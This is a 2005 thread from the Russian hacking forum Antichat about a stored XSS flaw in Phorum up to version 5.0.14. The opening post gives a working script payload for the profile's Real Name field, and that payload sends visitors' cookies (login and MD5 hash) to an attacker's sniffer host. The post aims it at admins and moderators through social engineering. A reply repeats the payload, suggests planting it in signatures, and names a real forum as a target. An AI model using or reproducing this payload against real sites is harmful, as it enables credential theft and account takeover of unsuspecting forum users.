Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

16.03.2005, 10:28
|
|
Познающий
Регистрация: 17.01.2005
Сообщений: 48
Провел на форуме: 24128
Репутация:
15
|
|
XSS в Phorum<=5.0.14
CyberLords тима, обнаружила данную XSS в форумах Phorum до 5.0.14 версии.
Суть уязвимости в том что за регавшись на форуме, в контрольном меню можно ввести прозивольную XSS.
А точнее заходим в раздел редактирования профиля My Profile-->Edit My Profile
В поле Real Name вводим имя затем XSS, пример:
Код:
Вовочка<script>alert(document.cookie)</script>
Сохраняем, при просмотре профиля выскачит окно с вашими куками, точенее ваш логин и MD5 хеш, то что нам нужно 
Теперь как можно употребить на других,
В поле Real Nаme вставим:
Код:
Вовочка<script>img = new Image(); img.src = "http://site.com/снифер/сниф.jpg?"+document.cookie;</script>
Или че то подобное, где URL это адрес снифера. 
Теперь каждый юзверь при просмотре вашего профиля отсылает на лог снифера свой логин и хеш МД5.
Вопрос как заманить нужную жертву (админ или модер) на ваш профиль...это дело соц. инженерии. 
Теперь, подделка куков,  жаль не сработала, вчера пыхтел любыми путями, не получилось  Может у кого другого получитса, дай знать  . Братец KEZ от снеми видео, еси такое дело с куками провернётса 
Просто этот форум времмено содержит куки, которые через некоторое время уничтажаютса, что требует повторной авторизации.
|
|
|

16.03.2005, 11:16
|
|
Guest
Сообщений: n/a
Провел на форуме:
Репутация:
|
|
Ну давай ссылку что нам гадать в чём проблема чтоли?
|
|
|
|

16.03.2005, 15:54
|
|
Guest
Сообщений: n/a
Провел на форуме:
Репутация:
|
|
Хотя если честно, то Я проблему знаю. Мне просто ссылка нужна. Ссылку давай короче.
|
|
|
|

16.03.2005, 15:59
|
|
[ розовый мафиозо ]
Регистрация: 16.03.2005
Сообщений: 301
Провел на форуме: 1736355
Репутация:
241
|
|
Сообщение от tester2005
CyberLords тима, обнаружила данную XSS в форумах Phorum до 5.0.14 версии.
Я эту фишку уже как 2 недели назад просек.
Сообщение от tester2005
Суть уязвимости в том что за регавшись на форуме, в контрольном меню можно ввести прозивольную XSS.
А точнее заходим в раздел редактирования профиля My Profile-->Edit My Profile
В поле Real Name вводим имя затем XSS, пример:
Код:
Вовочка<script>alert(document.cookie)</script>
Сохраняем, при просмотре профиля выскачит окно с вашими куками, точенее ваш логин и MD5 хеш, то что нам нужно  Теперь как можно употребить на других,
В поле Real Nаme вставим:
Код:
Вовочка<script>img = new Image(); img.src = "http://site.com/снифер/сниф.jpg?"+document.cookie;</script>
Или че то подобное, где URL это адрес снифера. 
Теперь каждый юзверь при просмотре вашего профиля отсылает на лог снифера свой логин и хеш МД5.
Вопрос как заманить нужную жертву (админ или модер) на ваш профиль...это дело соц. инженерии. 
Да её и заманивать никуда не недо , вставляешь скрипт в поле подписи, и просто гуляешь по форуму=)
Сообщение от tester2005
Теперь, подделка куков,  жаль не сработала, вчера пыхтел любыми путями, не получилось  Может у кого другого получитса, дай знать  . Братец KEZ от снеми видео, еси такое дело с куками провернётса 
Да, с подделкой действительно траблы, так что тут приходится все рассшифровывать.
|
|
|

16.03.2005, 16:01
|
|
[ розовый мафиозо ]
Регистрация: 16.03.2005
Сообщений: 301
Провел на форуме: 1736355
Репутация:
241
|
|
Если никто не против, на днях сделаю видео.
|
|
|

16.03.2005, 16:01
|
|
Guest
Сообщений: n/a
Провел на форуме:
Репутация:
|
|
Никаких трабл ну! Ссылку давайте Я знаю в чём ваша ошибка.
|
|
|
|

16.03.2005, 16:09
|
|
[ розовый мафиозо ]
Регистрация: 16.03.2005
Сообщений: 301
Провел на форуме: 1736355
Репутация:
241
|
|
Сообщение от White Jordan
Никаких трабл ну! Ссылку давайте Я знаю в чём ваша ошибка.
Ну возьми этот к примеру: http://www.recipe.ru/forum/
|
|
|

16.03.2005, 18:20
|
|
Познающий
Регистрация: 17.01.2005
Сообщений: 48
Провел на форуме: 24128
Репутация:
15
|
|
Сообщение от PinkPanther
Да её и заманивать никуда не недо , вставляешь скрипт в поле подписи, и просто гуляешь по форуму=)
Вроде в поле "подписи" эту уязвимость я не заметил,
ты о чем??
Сообщение от PinkPanther
Если никто не против, на днях сделаю видео.
а кто против?, античату да и всем наоборот лучше 
|
|
|

16.03.2005, 20:14
|
|
Guest
Сообщений: n/a
Провел на форуме:
Репутация:
|
|
Ну и форум... Что это за форум на котором можно ставить <script>
|
|
|
|

16.03.2005, 21:00
|
|
Познающий
Регистрация: 17.01.2005
Сообщений: 48
Провел на форуме: 24128
Репутация:
15
|
|
Сообщение от KEZ
Ну и форум... Что это за форум на котором можно ставить <script>
бывает..
эх, был бы выход куки подделать..
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|